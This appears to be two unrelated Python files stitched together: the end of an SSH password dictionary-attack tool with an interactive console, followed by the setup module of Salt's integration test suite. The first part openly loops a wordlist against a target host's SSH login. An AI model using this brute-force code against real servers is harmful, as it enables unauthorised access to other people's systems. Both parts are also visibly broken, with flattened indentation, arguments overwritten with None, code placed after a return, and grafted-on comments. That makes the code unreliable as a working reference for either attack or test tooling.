time.sleep(1)
connect(host, user, password, False)
finally:
if release:
connection_lock.release()
def run():
parser = argparse.ArgumentParser('SSH Dictionary Based Attack')
parser.add_argument('host', type=str, help='Host IP address for the SSH server')
parser.add_argument('user', type=str, help='Username for the SSH connection')
parser.add_argument('passwordFile', type=str, help='Password file to be used as the dictionary')
args = parser.parse_args()
host = None
user = None
passwordFile = None
global Found
global Fails
print('\n========================================')
print('Welcome to SSH Dictionary Based Attack')
print('========================================\n')
print('[+] Checking SSH port state on {}'.format(host))
if nmapScan(host) == 'open':
print('[+] SSH port 22 open on {}'.format(host))
else:
print('[!] SSH port 22 closed on {}'.format(host))
print('[+] Exiting Application.\n')
exit()
print('[+] Loading Password File\n')
try:
fn = open(passwordFile, 'rb')
except Exception as e:
print(e)
exit(1)
for line in fn:
if Found:
# print('[*] Exiting Password Found')
exit(0)
elif Fails > 5:
print('[!] Exiting: Too Many Socket Timeouts')
exit(0)
connection_lock.acquire()
password = line.strip()
print('[-] Testing Password With: {}'.format(password.decode('utf-8')))
#t = Thread(target=connect, host, user, password)
#t.start()
while (threading.active_count() > 1):
if threading.active_count() == 1 and Found != True:
print('\n===========================================')
print('\nPassword Not Found In Password File.\n')
print('===========================================\n')
print('[*] Exiting Application')
exit(0)
elif threading.active_count() == 1 and Found == True:
print('[*] Exiting Application.\n')
while True:
try:
option = input ("\033[96m┌─[SSF][\033[91m"+name+"\033[96m]\n└─▪ ")
op2 = option.split(" ")
if option == "help":
help()
elif option == "author":
print (author)
elif option == "info":
print (info)
elif option == "show_options":
options()
elif op2[0] == "set":
if op2[1]:
vars()[op2[1]] = op2[2]
print ("%s ==> %s"%(op2[1],op2[2]))
else:
print ("%s Not Found",op2[2])
elif option == "run":
run()
elif option == "exit":
break
else:
print ("Wrong Command ! ")
except:
        print ('Unknown Error!')
|
__init__.py
|
# -*- coding: utf-8 -*-
'''
Set up the Salt integration test suite
'''
# Import Python libs
from __future__ import absolute_import, print_function
import os
import re
import sys
import copy
import time
import stat
import errno
import signal
import shutil
import pprint
import atexit
import socket
import logging
import tempfile
import threading
import subprocess
import multiprocessing
from datetime import datetime, timedelta
try:
import pwd
except ImportError:
pass
# Import salt tests support dirs
from tests.support.paths import * # pylint: disable=wildcard-import
from tests.support.processes import * # pylint: disable=wildcard-import
from tests.support.unit import TestCase
from tests.support.case import ShellTestCase
from tests.support.parser import PNUM, print_header, SaltTestcaseParser
from tests.support.helpers import requires_sshd_server, RedirectStdStreams
from tests.support.paths import ScriptPathMixin
from tests.support.mixins import CheckShellBinaryNameAndVersionMixin, ShellCaseCommonTestsMixin
from tests.support.mixins import AdaptedConfigurationTestCaseMixin, SaltClientTestCaseMixin
from tests.support.mixins import SaltMinionEventAssertsMixin, SaltReturnAssertsMixin
from tests.support.runtests import RUNTIME_VARS
# Import Salt libs
import salt
import salt.config
import salt.master
import salt.minion
import salt.runner
import salt.output
import salt.version
import salt.utils.color
import salt.utils.files
import salt.utils.path
import salt.utils.platform
import salt.utils.process
import salt.utils.stringutils
import salt.utils.yaml
import salt.log.setup as salt_log_setup
from salt.utils.verify import verify_env
from salt.utils.immutabletypes import freeze
from salt.exceptions import SaltClientError
# Import 3rd-party libs
import msgpack
from salt.ext import six
try:
import salt.ext.six.moves.socketserver as socketserver
except ImportError:
import socketserver
# Import salt tests support libs
from tests.support.processes import SaltMaster, SaltMinion, SaltSyndic, SaltProxy  # SaltProxy assumed to live alongside the other daemon classes; used by the proxy branch below
log = logging.getLogger(__name__)
_RUNTESTS_PORTS = {}
def get_unused_localhost_port():
'''
Return a random unused port on localhost
'''
usock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
usock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
usock.bind(('127.0.0.1', 0))
port = usock.getsockname()[1]
if port in (54505, 54506, 64505, 64506, 64510, 64511, 64520, 64521):
# These ports are hardcoded in the test configuration
port = get_unused_localhost_port()
usock.close()
return port
DARWIN = True if sys.platform.startswith('darwin') else False
BSD = True if 'bsd' in sys.platform else False
if DARWIN and port in _RUNTESTS_PORTS:
port = get_unused_localhost_port()
usock.close()
return port
_RUNTESTS_PORTS[port] = usock
if DARWIN or BSD:
usock.close()
return port
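# Note on get_unused_localhost_port() above: every port handed out is recorded
# in _RUNTESTS_PORTS together with its socket. On most platforms the socket
# stays bound until close_open_sockets() runs at exit, keeping the port
# reserved; on macOS/BSD the socket is closed straight away, and on macOS the
# dict is re-checked so the same port is not handed out twice in one run.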
def close_open_sockets(sockets_dict):
for port in list(sockets_dict):
sock = sockets_dict.pop(port)
sock.close()
atexit.register(close_open_sockets, _RUNTESTS_PORTS)
SALT_LOG_PORT = get_unused_localhost_port()
class ThreadingMixIn(socketserver.ThreadingMixIn):
daemon_threads = True
class ThreadedSocketServer(ThreadingMixIn, socketserver.TCPServer):
allow_reuse_address = True
def server_activate(self):
self.shutting_down = threading.Event()
socketserver.TCPServer.server_activate(self)
#super(ThreadedSocketServer, self).server_activate()
def server_close(self):
if hasattr(self, 'shutting_down'):
self.shutting_down.set()
socketserver.TCPServer.server_close(self)
#super(ThreadedSocketServer, self).server_close()
class SocketServerRequestHandler(socketserver.StreamRequestHandler):
def handle(self):
unpacker = msgpack.Unpacker(encoding='utf-8')
while not self.server.shutting_down.is_set():
try:
wire_bytes = self.request.recv(1024)
if not wire_bytes:
break
unpacker.feed(wire_bytes)
for record_dict in unpacker:
record = logging.makeLogRecord(record_dict)
logger = logging.getLogger(record.name)
logger.handle(record)
del record_dict
except (EOFError, KeyboardInterrupt, SystemExit):
break
except socket.error as exc:
try:
if exc.errno == errno.WSAECONNRESET:
# Connection reset on windows
break
except AttributeError:
# We're not on windows
pass
log.exception(exc)
except Exception as exc:
log.exception(exc)
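# Purely illustrative sketch of the sending side that SocketServerRequestHandler
# expects: a log record serialised to a dict with msgpack and written to the
# TCP log server. The real forwarding is done by salt's runtests log handlers;
# the helper name below is hypothetical and is never called by this module.
def _example_send_log_record(port, message):
    record = logging.LogRecord('runtests', logging.INFO, __file__, 0, message, None, None)
    # use_bin_type=False keeps strings as msgpack raw types, matching the
    # Unpacker(encoding='utf-8') used by the handler above.
    payload = msgpack.packb(record.__dict__, use_bin_type=False)
    sock = socket.create_connection(('localhost', port))
    try:
        sock.sendall(payload)
    finally:
        sock.close()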
class TestDaemon(object):
'''
Set up the master and minion daemons, and run related cases
'''
MINIONS_CONNECT_TIMEOUT = MINIONS_SYNC_TIMEOUT = 120
def __init__(self, parser):
self.parser = parser
self.colors = salt.utils.color.get_colors(self.parser.options.no_colors is False)
if salt.utils.platform.is_windows():
# There's no shell color support on windows...
for key in self.colors:
self.colors[key] = ''
def __enter__(self):
'''
Start a master and minion
'''
# Setup the multiprocessing logging queue listener
salt_log_setup.setup_multiprocessing_logging_listener(
self.master_opts
)
# Set up PATH to mockbin
self._enter_mockbin()
if self.parser.options.transport == 'zeromq':
self.start_zeromq_daemons()
elif self.parser.options.transport == 'tcp':
self.start_tcp_daemons()
self.minion_targets = set(['minion', 'sub_minion'])
self.pre_setup_minions()
self.setup_minions()
if getattr(self.parser.options, 'ssh', False):
self.prep_ssh()
if self.parser.options.sysinfo:
try:
print_header(
'~~~~~~~ Versions Report ', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('~~~~~~~ Versions Report ', inline=True)
print('\n'.join(salt.version.versions_report()))
try:
print_header(
'~~~~~~~ Minion Grains Information ', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('~~~~~~~ Minion Grains Information ', inline=True)
grains = self.client.cmd('minion', 'grains.items')
minion_opts = self.minion_opts.copy()
minion_opts['color'] = self.parser.options.no_colors is False
salt.output.display_output(grains, 'grains', minion_opts)
try:
print_header(
'=', sep='=', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('', sep='=', inline=True)
try:
return self
finally:
self.post_setup_minions()
def start_daemon(self, cls, opts, start_fun):
def start(cls, opts, start_fun):
salt.utils.process.appendproctitle('{0}-{1}'.format(self.__class__.__name__, cls.__name__))
daemon = cls(opts)
getattr(daemon, start_fun)()
process = multiprocessing.Process(target=start,
args=(cls, opts, start_fun))
process.start()
return process
def start_zeromq_daemons(self):
'''
Fire up the daemons used for zeromq tests
'''
self.log_server = ThreadedSocketServer(('localhost', SALT_LOG_PORT), SocketServerRequestHandler)
self.log_server_process = threading.Thread(target=self.log_server.serve_forever)
self.log_server_process.daemon = True
self.log_server_process.start()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting salt-master ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.master_process = start_daemon(
daemon_name='salt-master',
daemon_id=self.master_opts['id'],
daemon_log_prefix='salt-master/{}'.format(self.master_opts['id']),
daemon_cli_script_name='master',
daemon_config=self.master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=60)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting salt-master ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting salt-master ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting salt-minion ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.minion_process = start_daemon(
daemon_name='salt-minion',
daemon_id=self.master_opts['id'],
daemon_log_prefix='salt-minion/{}'.format(self.minion_opts['id']),
daemon_cli_script_name='minion',
daemon_config=self.minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=60)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting salt-minion ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting salt-minion ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting sub salt-minion ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.sub_minion_process = start_daemon(
daemon_name='sub salt-minion',
daemon_id=self.master_opts['id'],
daemon_log_prefix='sub-salt-minion/{}'.format(self.sub_minion_opts['id']),
daemon_cli_script_name='minion',
daemon_config=self.sub_minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=60)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting sub salt-minion ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting sub salt-minion ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting syndic salt-master ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.smaster_process = start_daemon(
daemon_name='salt-smaster',
daemon_id=self.syndic_master_opts['id'],
daemon_log_prefix='salt-smaster/{}'.format(self.syndic_master_opts['id']),
daemon_cli_script_name='master',
daemon_config=self.syndic_master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=60)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting syndic salt-master ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting syndic salt-master ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting salt-syndic ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.syndic_process = start_daemon(
daemon_name='salt-syndic',
daemon_id=self.syndic_opts['id'],
daemon_log_prefix='salt-syndic/{}'.format(self.syndic_opts['id']),
daemon_cli_script_name='syndic',
daemon_config=self.syndic_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR,
daemon_class=SaltSyndic,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=60)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting salt-syndic ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting salt-syndic ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
if self.parser.options.proxy:
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting salt-proxy ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.proxy_process = start_daemon(
daemon_name='salt-proxy',
daemon_id=self.master_opts['id'],
daemon_log_prefix='salt-proxy/{}'.format(self.proxy_opts['id']),
daemon_cli_script_name='proxy',
daemon_config=self.proxy_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltProxy,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=60)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting salt-proxy ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting salt-proxy ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
start_tcp_daemons = start_zeromq_daemons
def prep_ssh(self):
'''
Generate keys and start an ssh daemon on an alternate port
'''
sys.stdout.write(
' * {LIGHT_GREEN}Starting {0} ... {ENDC}'.format(
'SSH server',
**self.colors
)
)
keygen = salt.utils.path.which('ssh-keygen')
sshd = salt.utils.path.which('sshd')
if not (keygen and sshd):
print('WARNING: Could not initialize SSH subsystem. Tests for salt-ssh may break!')
return
if not os.path.exists(RUNTIME_VARS.TMP_CONF_DIR):
os.makedirs(RUNTIME_VARS.TMP_CONF_DIR)
# Generate client key
pub_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'key_test.pub')
priv_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'key_test')
if os.path.exists(pub_key_test_file):
os.remove(pub_key_test_file)
if os.path.exists(priv_key_test_file):
os.remove(priv_key_test_file)
keygen_process = subprocess.Popen(
[keygen, '-t',
'ecdsa',
'-b',
'521',
'-C',
'"$(whoami)@$(hostname)-$(date -I)"',
'-f',
'key_test',
'-P',
''],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=RUNTIME_VARS.TMP_CONF_DIR
)
_, keygen_err = keygen_process.communicate()
if keygen_err:
print('ssh-keygen had errors: {0}'.format(salt.utils.stringutils.to_str(keygen_err)))
sshd_config_path = os.path.join(FILES, 'conf/_ssh/sshd_config')
shutil.copy(sshd_config_path, RUNTIME_VARS.TMP_CONF_DIR)
auth_key_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'key_test.pub')
# Generate server key
server_key_dir = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'server')
if not os.path.exists(server_key_dir):
os.makedirs(server_key_dir)
server_dsa_priv_key_file = os.path.join(server_key_dir, 'ssh_host_dsa_key')
server_dsa_pub_key_file = os.path.join(server_key_dir, 'ssh_host_dsa_key.pub')
server_ecdsa_priv_key_file = os.path.join(server_key_dir, 'ssh_host_ecdsa_key')
server_ecdsa_pub_key_file = os.path.join(server_key_dir, 'ssh_host_ecdsa_key.pub')
server_ed25519_priv_key_file = os.path.join(server_key_dir, 'ssh_host_ed25519_key')
        server_ed25519_pub_key_file = os.path.join(server_key_dir, 'ssh_host_ed25519_key.pub')
for server_key_file in (server_dsa_priv_key_file,
server_dsa_pub_key_file,
server_ecdsa_priv_key_file,
server_ecdsa_pub_key_file,
server_ed25519_priv_key_file,
server_ed25519_pub_key_file):
if os.path.exists(server_key_file):
os.remove(server_key_file)
keygen_process_dsa = subprocess.Popen(
[keygen, '-t',
'dsa',
'-b',
'1024',
'-C',
'"$(whoami)@$(hostname)-$(date -I)"',
'-f',
'ssh_host_dsa_key',
'-P',
''],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir
)
_, keygen_dsa_err = keygen_process_dsa.communicate()
if keygen_dsa_err:
print('ssh-keygen had errors: {0}'.format(salt.utils.stringutils.to_str(keygen_dsa_err)))
keygen_process_ecdsa = subprocess.Popen(
[keygen, '-t',
'ecdsa',
'-b',
'521',
'-C',
'"$(whoami)@$(hostname)-$(date -I)"',
'-f',
'ssh_host_ecdsa_key',
'-P',
''],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir
)
_, keygen_escda_err = keygen_process_ecdsa.communicate()
if keygen_escda_err:
print('ssh-keygen had errors: {0}'.format(salt.utils.stringutils.to_str(keygen_escda_err)))
keygen_process_ed25519 = subprocess.Popen(
[keygen, '-t',
'ed25519',
'-b',
'521',
'-C',
'"$(whoami)@$(hostname)-$(date -I)"',
'-f',
'ssh_host_ed25519_key',
'-P',
''],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir
)
_, keygen_ed25519_err = keygen_process_ed25519.communicate()
if keygen_ed25519_err:
print('ssh-keygen had errors: {0}'.format(salt.utils.stringutils.to_str(keygen_ed25519_err)))
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'sshd_config'), 'a') as ssh_config:
ssh_config.write('AuthorizedKeysFile {0}\n'.format(auth_key_file))
if not keygen_dsa_err:
ssh_config.write('HostKey {0}\n'.format(server_dsa_priv_key_file))
if not keygen_escda_err:
ssh_config.write('HostKey {0}\n'.format(server_ecdsa_priv_key_file))
if not keygen_ed25519_err:
ssh_config.write('HostKey {0}\n'.format(server_ed25519_priv_key_file))
self.sshd_pidfile = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'sshd.pid')
self.sshd_process = subprocess.Popen(
[sshd, '-f', 'sshd_config', '-oPidFile={0}'.format(self.sshd_pidfile)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=RUNTIME_VARS.TMP_CONF_DIR
)
_, sshd_err = self.sshd_process.communicate()
if sshd_err:
print('sshd had errors on startup: {0}'.format(salt.utils.stringutils.to_str(sshd_err)))
else:
os.environ['SSH_DAEMON_RUNNING'] = 'True'
roster_path = os.path.join(FILES, 'conf/_ssh/roster')
syndic_roster_path = os.path.join(FILES, 'conf/_ssh/syndic_roster')
shutil.copy(roster_path, RUNTIME_VARS.TMP_CONF_DIR)
shutil.copy(syndic_roster_path, os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, 'roster'))
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'roster'), 'a') as roster:
roster.write(' user: {0}\n'.format(RUNTIME_VARS.RUNNING_TESTS_USER))
roster.write(' priv: {0}/{1}'.format(RUNTIME_VARS.TMP_CONF_DIR, 'key_test'))
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, 'roster'), 'a') as roster:
roster.write(' user: {0}\n'.format(RUNTIME_VARS.RUNNING_TESTS_USER))
roster.write(' priv: {0}/{1}'.format(RUNTIME_VARS.TMP_CONF_DIR, 'key_test'))
sys.stdout.write(
' {LIGHT_GREEN}STARTED!\n{ENDC}'.format(
**self.colors
)
)
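    # For orientation only: after the roster writes above, a salt-ssh roster
    # entry ends up shaped roughly like the sketch below. The target name,
    # host and port come from the copied conf/_ssh/roster template and are
    # only assumed here.
    #
    #     localhost:
    #       host: 127.0.0.1
    #       port: 2827
    #       user: <RUNTIME_VARS.RUNNING_TESTS_USER>
    #       priv: <RUNTIME_VARS.TMP_CONF_DIR>/key_test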
@classmethod
def config(cls, role):
'''
Return a configuration for a master/minion/syndic.
Currently these roles are:
* master
* minion
* syndic
* syndic_master
* sub_minion
* proxy
'''
return RUNTIME_VARS.RUNTIME_CONFIGS[role]
@classmethod
def config_location(cls):
return RUNTIME_VARS.TMP_CONF_DIR
@property
def client(self):
'''
Return a local client which will be used for example to ping and sync
the test minions.
        This client is defined as a class attribute because its creation needs
        to be deferred to a later stage. If it were created on `__enter__`, as it
        previously was, it would not receive the master events.
'''
if 'runtime_client' not in RUNTIME_VARS.RUNTIME_CONFIGS:
RUNTIME_VARS.RUNTIME_CONFIGS['runtime_client'] = salt.client.get_local_client(
mopts=self.master_opts
)
return RUNTIME_VARS.RUNTIME_CONFIGS['runtime_client']
@classmethod
def transplant_configs(cls, transport='zeromq'):
if os.path.isdir(RUNTIME_VARS.TMP_CONF_DIR):
shutil.rmtree(RUNTIME_VARS.TMP_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR)
if not os.path.exists(RUNTIME_VARS.TMP):
os.makedirs(RUNTIME_VARS.TMP)
print(' * Transplanting configuration files to \'{0}\''.format(RUNTIME_VARS.TMP_CONF_DIR))
tests_known_hosts_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'salt_ssh_known_hosts')
with salt.utils.files.fopen(tests_known_hosts_file, 'w') as known_hosts:
known_hosts.write('')
# This master connects to syndic_master via a syndic
master_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'master'))
master_opts['known_hosts_file'] = tests_known_hosts_file
master_opts['cachedir'] = os.path.join(TMP, 'rootdir', 'cache')
master_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
master_opts['config_dir'] = RUNTIME_VARS.TMP_CONF_DIR
master_opts['root_dir'] = os.path.join(TMP, 'rootdir')
master_opts['pki_dir'] = os.path.join(TMP, 'rootdir', 'pki', 'master')
master_opts['syndic_master'] = 'localhost'
# This minion connects to master
minion_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'minion'))
minion_opts['cachedir'] = os.path.join(TMP, 'rootdir', 'cache')
minion_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
minion_opts['config_dir'] = RUNTIME_VARS.TMP_CONF_DIR
minion_opts['root_dir'] = os.path.join(TMP, 'rootdir')
minion_opts['pki_dir'] = os.path.join(TMP, 'rootdir', 'pki')
minion_opts['hosts.file'] = os.path.join(TMP, 'rootdir', 'hosts')
minion_opts['aliases.file'] = os.path.join(TMP, 'rootdir', 'aliases')
# This sub_minion also connects to master
sub_minion_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'sub_minion'))
sub_minion_opts['cachedir'] = os.path.join(TMP, 'rootdir-sub-minion', 'cache')
sub_minion_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
sub_minion_opts['config_dir'] = RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR
sub_minion_opts['root_dir'] = os.path.join(TMP, 'rootdir-sub-minion')
sub_minion_opts['pki_dir'] = os.path.join(TMP, 'rootdir-sub-minion', 'pki', 'minion')
sub_minion_opts['hosts.file'] = os.path.join(TMP, 'rootdir', 'hosts')
sub_minion_opts['aliases.file'] = os.path.join(TMP, 'rootdir', 'aliases')
# This is the master of masters
syndic_master_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'syndic_master'))
syndic_master_opts['cachedir'] = os.path.join(TMP, 'rootdir-syndic-master', 'cache')
syndic_master_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
syndic_master_opts['config_dir'] = RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR
syndic_master_opts['root_dir'] = os.path.join(TMP, 'rootdir-syndic-master')
syndic_master_opts['pki_dir'] = os.path.join(TMP, 'rootdir-syndic-master', 'pki', 'master')
# This is the syndic for master
# Let's start with a copy of the syndic master configuration
syndic_opts = copy.deepcopy(syndic_master_opts)
# Let's update with the syndic configuration
syndic_opts.update(salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'syndic')))
syndic_opts['config_dir'] = RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR
syndic_opts['cachedir'] = os.path.join(TMP, 'rootdir', 'cache')
syndic_opts['root_dir'] = os.path.join(TMP, 'rootdir')
# This proxy connects to master
proxy_opts = salt.config._read_conf_file(os.path.join(CONF_DIR, 'proxy'))
proxy_opts['cachedir'] = os.path.join(TMP, 'rootdir-proxy', 'cache')
if not os.path.exists(proxy_opts['cachedir']):
os.makedirs(proxy_opts['cachedir'])
# proxy_opts['user'] = running_tests_user
proxy_opts['config_dir'] = RUNTIME_VARS.TMP_CONF_DIR
proxy_opts['root_dir'] = os.path.join(TMP, 'rootdir-proxy')
proxy_opts['pki_dir'] = os.path.join(TMP, 'rootdir-proxy', 'pki')
if not os.path.exists(proxy_opts['pki_dir']):
os.makedirs(proxy_opts['pki_dir'])
proxy_opts['hosts.file'] = os.path.join(TMP, 'rootdir-proxy', 'hosts')
proxy_opts['aliases.file'] = os.path.join(TMP, 'rootdir-proxy', 'aliases')
if transport == 'tcp':
master_opts['transport'] = 'tcp'
minion_opts['transport'] = 'tcp'
sub_minion_opts['transport'] = 'tcp'
syndic_master_opts['transport'] = 'tcp'
proxy_opts['transport'] = 'tcp'
# Set up config options that require internal data
master_opts['pillar_roots'] = syndic_master_opts['pillar_roots'] = {
'base': [
RUNTIME_VARS.TMP_PILLAR_TREE,
os.path.join(FILES, 'pillar', 'base'),
]
}
minion_opts['pillar_roots'] = {
'base': [
RUNTIME_VARS.TMP_PILLAR_TREE,
os.path.join(FILES, 'pillar', 'base'),
]
}
master_opts['file_roots'] = syndic_master_opts['file_roots'] = {
'base': [
os.path.join(FILES, 'file', 'base'),
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
RUNTIME_VARS.TMP_STATE_TREE
],
# Alternate root to test __env__ choices
'prod': [
os.path.join(FILES, 'file', 'prod'),
RUNTIME_VARS.TMP_PRODENV_STATE_TREE
]
}
minion_opts['file_roots'] = {
'base': [
os.path.join(FILES, 'file', 'base'),
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
RUNTIME_VARS.TMP_STATE_TREE
],
# Alternate root to test __env__ choices
'prod': [
os.path.join(FILES, 'file', 'prod'),
RUNTIME_VARS.TMP_PRODENV_STATE_TREE
]
}
master_opts.setdefault('reactor', []).append(
{
'salt/minion/*/start': [
os.path.join(FILES, 'reactor-sync-minion.sls')
],
}
)
for opts_dict in (master_opts, syndic_master_opts):
if 'ext_pillar' not in opts_dict:
opts_dict['ext_pillar'] = []
if salt.utils.platform.is_windows():
opts_dict['ext_pillar'].append(
{'cmd_yaml': 'type {0}'.format(os.path.join(FILES, 'ext.yaml'))})
else:
opts_dict['ext_pillar'].append(
{'cmd_yaml': 'cat {0}'.format(os.path.join(FILES, 'ext.yaml'))})
# all read, only owner write
autosign_file_permissions = stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH | stat.S_IWUSR
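        # Numerically this is the familiar 0o644 mode: S_IRUSR|S_IWUSR (0o600) for the
        # owner plus the S_IRGRP|S_IROTH (0o044) read bits for group and others.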
for opts_dict in (master_opts, syndic_master_opts):
            # We need to copy the extension modules into the new master root_dir,
            # otherwise the configured path gets prefixed by root_dir and ends up
            # pointing at a directory that does not exist
new_extension_modules_path = os.path.join(opts_dict['root_dir'], 'extension_modules')
if not os.path.exists(new_extension_modules_path):
shutil.copytree(
os.path.join(
INTEGRATION_TEST_DIR, 'files', 'extension_modules'
),
new_extension_modules_path
)
opts_dict['extension_modules'] = os.path.join(opts_dict['root_dir'], 'extension_modules')
# Copy the autosign_file to the new master root_dir
new_autosign_file_path = os.path.join(opts_dict['root_dir'], 'autosign_file')
shutil.copyfile(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'autosign_file'),
new_autosign_file_path
)
os.chmod(new_autosign_file_path, autosign_file_permissions)
# Point the config values to the correct temporary paths
for name in ('hosts', 'aliases'):
